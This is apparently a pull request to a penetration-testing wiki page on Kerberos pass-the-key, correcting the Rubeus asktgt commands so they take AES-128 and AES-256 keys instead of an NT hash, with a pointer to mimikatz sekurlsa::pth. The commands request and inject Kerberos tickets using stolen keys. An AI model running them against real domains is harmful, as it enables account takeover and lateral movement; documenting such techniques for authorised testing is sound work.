### PR TITLE
Fix: parameters variables names [Pass the key - Rubeus]

### DIFF
--- a/ad/movement/kerberos/ptk.md
+++ b/ad/movement/kerberos/ptk.md
@@ -42,10 +42,10 @@ On Windows, requesting a TGT can be achieved with [Rubeus](https://github.com/Gh
 Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt
 
 # with an AES 128 key
-Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$NThash /ptt
+Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$aes128_key /ptt
 
 # with an AES 256 key
-Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$NThash /ptt
+Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$aes256_key /ptt
 ```
 
 An alternative to Rubeus is [mimikatz](https://github.com/gentilkiwi/mimikatz) with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).


### PR DESCRIPTION
To pass the key with Rubeus we need to use the AES key with AES algorithm instead of the NT hash.